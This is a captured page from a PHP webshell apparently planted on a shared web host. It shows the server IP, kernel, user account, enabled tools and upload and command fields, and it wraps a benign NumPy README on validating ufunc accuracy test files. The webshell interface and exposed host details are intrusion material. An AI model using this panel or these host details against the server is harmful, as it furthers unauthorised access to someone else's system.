403Webshell
Server IP : 66.29.132.122  /  Your IP : 3.137.223.190
Web Server : LiteSpeed
System : Linux business142.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : admazpex ( 531)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/self/root/opt/cloudlinux/venv/lib/python3.11/site-packages/numpy/core/tests/data/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/opt/cloudlinux/venv/lib/python3.11/site-packages/numpy/core/tests/data/umath-validation-set-README.txt
Steps to validate transcendental functions:
1) Add a file 'umath-validation-set-<ufuncname>.txt', where ufuncname is name of
   the function in NumPy you want to validate
2) The file should contain 4 columns: dtype,input,expected output,ulperror
    a. dtype: one of np.float16, np.float32, np.float64
    b. input: floating point input to ufunc in hex. Example: 0x414570a4
       represents 12.340000152587890625
    c. expected output: floating point output for the corresponding input in hex.
       This should be computed using a high(er) precision library and then rounded to
       same format as the input.
    d. ulperror: expected maximum ulp error of the function. This
       should be same across all rows of the same dtype. Otherwise, the function is
       tested for the maximum ulp error among all entries of that dtype.
3) Add file umath-validation-set-<ufuncname>.txt to the test file test_umath_accuracy.py
   which will then validate your ufunc.

Youez - 2016 - github.com/yon3zu
LinuXploit